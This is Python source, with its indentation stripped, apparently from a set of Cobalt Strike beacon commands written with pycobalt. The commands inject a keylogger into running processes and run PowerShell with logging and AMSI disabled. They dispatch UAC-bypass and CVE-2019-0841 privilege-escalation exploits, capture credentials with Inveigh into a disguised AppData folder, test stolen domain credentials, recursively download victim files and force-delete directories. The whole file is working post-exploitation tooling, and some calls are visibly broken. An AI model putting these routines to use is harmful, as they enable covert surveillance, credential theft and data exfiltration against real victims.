def _(bid, code, *args):
aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
try:
sharpgen.execute(bid, code, *args)
except RuntimeError as e:
aggressor.berror(
bid, 'SharpGen failed. See script console for more details')
def _(bid, *proc_names):
if not proc_names:
# defaults
proc_names = default_procs
def parsed_callback(procs):
found = None
for search in proc_names:
for proc in procs:
if search == proc['name'] and 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid, 'Keylogging process {} ({} {})'.format(
proc['name'], proc['pid'], proc['arch']))
aggressor.bkeylogger(bid,
proc['pid'],
proc['arch'],
silent=True)
return
# nothing found
aggressor.berror(bid, "Didn't find any processes to inject keylogger")
def ps_callback(bid, content):
procs = helpers.parse_ps(content)
parsed_callback(procs)
aggressor.btask(
bid, 'Tasked beacon to keylog first accessible process named: ' +
', '.join(proc_names))
aggressor.bps(bid, ps_callback)
def run(bid, program, args=None, silent=False):
# no args
if not args:
args = []
if program in assemblies:
assembly = assemblies[program]
args = helpers.eaq(args)
if not silent:
aggressor.btask(bid,
'Tasked beacon to run {} {}'.format(program, args))
aggressor.bexecute_assembly(bid, assembly, args, silent=True)
elif program in powershell:
script = powershell[program]
aggressor.bpowershell_import(bid, script)
if isinstance(args, list) or isinstance(args, tuple):
args = ' '.join(powershell_quote(args))
aggressor.bpowerpick(bid, ' '.join(args))
elif program in callbacks:
callback = callbacks[program]
callback(bid, args, silent=silent)
else:
raise RuntimeError('Unrecognized program: {}'.format(program))
def custom_powerpick(bid, command, silent=False, auto_host=True):
# public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
code = helpers.code_string(r"""
string powershell = String.Join("\n", args);
var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true);
foreach (string result in results) {
Console.Write(result);
}
""")
if not silent:
aggressor.btask(
bid, 'Tasked beacon to run: {} (custom unmanaged)'.format(
command.replace('\n', ' ')))
# include cradle for `powershell-import`/`bpowershell_import`
cradle = aggressor.beacon_host_imported_script(bid)
if cradle:
command = cradle + '\n' + command
# if the script is too long, host it
if auto_host and len(command) > max_script_size:
command = aggressor.beacon_host_script(bid, command)
engine.message(command)
references = [
'mscorlib.dll', 'System.dll', 'System.Core.dll',
'System.Management.Automation.dll'
]
sharpgen.execute(bid,
code, [''] + command.split('\n'),
references=references,
resources=[],
cache=sharpgen_cache)
def _(bid, exploit, *args):
callbacks = {
'token-shellcode': elevate_token_shellcode,
'token-command': elevate_token_command,
'slui-shellcode': elevate_slui_shellcode,
'slui-command': elevate_slui_command,
'fodhelper-shellcode': elevate_fodhelper_shellcode,
'fodhelper-command': elevate_fodhelper_command,
'eventvwr-command': elevate_eventvwr_command,
'wscript-shellcode': elevate_wscript_shellcode,
'wscript-command': elevate_wscript_command,
'runas-shellcode': elevate_runas_shellcode,
'cve-2019-0841': elevate_cve_2019_0841,
}
if exploit in callbacks:
aggressor.btask(
bid, 'Tasked beacon to elevate with exploit: {}'.format(exploit))
callback = callbacks[exploit]
if not pycobalt.utils.check_args(callback, (bid, ) + args):
signature = pycobalt.utils.signature(callback, trim=1)
aggressor.berror(
bid, 'Invalid arguments to exploit {}. Signature: {}'.format(
exploit, signature))
return
callback(bid, *args)
else:
aggressor.berror(
bid,
'Exploit must be one of: {}'.format(', '.join(callbacks.keys())))
def _(bid):
command = textwrap.dedent("""
wmic os get Caption /value | more
wmic qfe
""")
aggressor.btask(bid, 'Tasked beacon to get patch status')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = ''
for d in ['Desktop', 'Documents', 'Downloads', 'Favorites']:
command += 'ls $env:userprofile\\{}\n'.format(d)
aggressor.btask(bid, 'Tasked beacon to show common document folders')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = textwrap.dedent("""
ls $env:localappdata
ls $env:appdata
""")
aggressor.btask(bid, 'Tasked beacon to show AppData')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = helpers.code_string(r"""
Get-Process |
Where { $_.mainWindowTitle } |
Format-Table id,name,mainwindowtitle -AutoSize
""")
aggressor.btask(bid, 'Tasked beacon to list open windows')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts):
exe = '/share/tools/post_exploitation/TestAntivirus/bin/Release/net35/TestAntivirus.exe'
if hosts:
aggressor.btask(bid, 'Tasked beacon to check AV on: ' + ', '.join(hosts))
else:
aggressor.btask(bid, 'Tasked beacon to check local AV')
aggressor.bexecute_assembly(bid, exe, helpers.eaq(hosts), silent=True)
def _(bid, *directories):
def callback(path):
aggressor.bdownload(bid, path)
for directory in directories:
aggressor.btask(
bid, 'Tasked beacon to recurse {} for files to download'.format(
directory))
helpers.recurse_ls(bid, directory, callback)
def _(bid):
command = textwrap.dedent(r"""
Get-Childitem -path env:* |
Select-Object Name, Value |
Sort-Object name |
Format-Table -Auto
""")
aggressor.btask(bid, 'Tasked beacon to get environmental variables')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = textwrap.dedent(r"""
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |
Select-Object DisplayName, InstallDate |
Sort-Object -Property DisplayName |
Format-Table -AutoSize
""")
aggressor.btask(bid, 'Tasked beacon to get list of uninstallers')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, code, *args):
aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
try:
from_cache = sharpgen.execute(bid, code, args, cache=cache)
if from_cache:
aggressor.blog2(bid, 'Build was retrieved from the cache')
except RuntimeError as e:
aggressor.berror(
bid, 'SharpGen failed. See Script Console for more details.')
def _(bid, runtime=99999, *args):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
aggressor.btask(
bid,
'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft'
)
aggressor.bpowerpick(
bid,
r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory $env:userprofile\AppData\Roaming\Microsoft -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
.format(runtime, ' '.join(args)))
def _(bid):
command = helpers.code_string(r"""
wmic os get Caption /value
Get-WmiObject -class Win32_quickfixengineering |
Select-Object HotFixID,Description,InstalledBy,InstalledOn |
Sort-Object InstalledOn -Descending |
Format-Table -Auto
""")
aggressor.btask(bid, 'Tasked beacon to get patch info')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, home=None):
if not home:
home = helpers.guess_home(bid)
directory = r'{}\AppData\Roaming\Microsoft'.format(home)
aggressor.btask(
bid, 'Tasked beacon to remove inveigh files in {}'.format(directory))
for fname in ('clear', 'log', 'v1', 'v2', 'form'):
aggressor.brm(bid, r'{}\{}'.format(directory, fname))
def _(bid):
command = helpers.code_string(r"""
if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
echo "User is a local admin!";
} else {
echo "User is not local admin :(";
}
""")
aggressor.btask(bid, 'Tasked beacon to check if user is a local admin')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, fname, lines=10):
code = helpers.code_string(r"""
string file = args[0];
int lines = Int32.Parse(args[1]);
string text = string.Join("\r\n", System.IO.File.ReadLines(file).Take(lines));
System.Console.WriteLine(text);
""")
aggressor.btask('Tasked beacon to get first {} lines of {}'.format(
lines, fname))
sharpgen.execute(bid, code, (fname, lines))
def _(bid):
command = helpers.code_string(r"""
If ((gwmi win32_computersystem).partofdomain){
Write-Output "User is in domain: $env:userdomain"
} Else {
Write-Output "User is not in a domain"
}
""")
aggressor.btask(bid, "Tasked beacon to check if it's in a domain")
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = 'ls '
command += ', '.join([powershell_quote('{}\*\*'.format(d)) for d in dirs])
aggressor.btask(bid,
'Tasked beacon to list */* in: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def callback(procs):
if procs:
for proc in procs:
out = 'Killing {}: {}'.format(proc_name, proc['pid'])
if 'arch' in proc:
out += ' ({})'.format(proc['arch'])
if 'user' in proc:
out += ' ({})'.format(proc['user'])
aggressor.btask(bid, out)
aggressor.bkill(bid, proc['pid'], silent=True)
else:
aggressor.berror(bid, 'No processes named {}'.format(proc_name))
def _(bid, last=50):
command = helpers.code_string(r"""
$hist = (Get-Content "$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -EA 0 |
Select -last {})
if ($hist) {{
$hist -Join "`r`n"
}} else {{
"No Powershell history found"
}}
""".format(last))
aggressor.btask(bid, 'Tasked beacon to show {} items of powershell history'.format(last))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
if not dirs:
aggressor.berror(bid, 'rmr: specify some directories to kill')
return
command = ''
for d in dirs:
command += 'Remove-Item -Recurse -Force {}\n'.format(
powershell_quote(d))
aggressor.btask(
bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = ''
for d in dirs:
command += 'Get-ChildItem -Recurse {}\n'.format(powershell_quote(d))
aggressor.btask(
bid, 'Tasked beacon to recursively list files in: {}'.format(
', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts):
command = ''
if not hosts:
aggressor.berror('specify a host')
return
for host in hosts:
command += 'nslookup {}\n'.format(powershell_quote(host))
aggressor.btask(
bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *users):
if users:
aggressor.btask(
bid, 'Tasked beacon to list files in user profiles for: {}'.format(
', '.join(users)))
for user in users:
aggressor.bls(bid, r'C:\Users\{}'.format(user), silent=True)
else:
aggressor.btask(bid,
'Tasked beacon to list files in each user profile')
aggressor.bpowerpick(bid,
r'ls C:\Users | ForEach-Object { ls $_; }',
silent=True)
def _(bid, username, password):
command = helpers.code_string(r"""
if ((new-object directoryservices.directoryentry "", "{username}", "{password}").psbase.name -ne $null) {{
Write-Host "Credentials {username}:{password} are valid :)"
}} else {{
Write-Host "Credentials {username}:{password} are not valid :("
}}
""".format(username=username, password=password))
aggressor.btask(
bid,
'Tasked beacon to test credentials {}:{}'.format(username, password))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = ''
for d in dirs:
command += 'Get-ChildItem {} | % {{ fsutil reparsepoint query $_ }}\n'.format(
powershell_quote(d))
aggressor.btask(
bid, 'Tasked beacon to list links in: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
global _uploaded
if not _uploaded:
aggressor.berror('Run 7z-init first')
return
line = ' '.join(args)
aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(line))
aggressor.bpowerpick(
bid,
"echo '7zip starting'; {} {} ; echo '7zip finished';".format(
_uploaded, line),
silent=True)
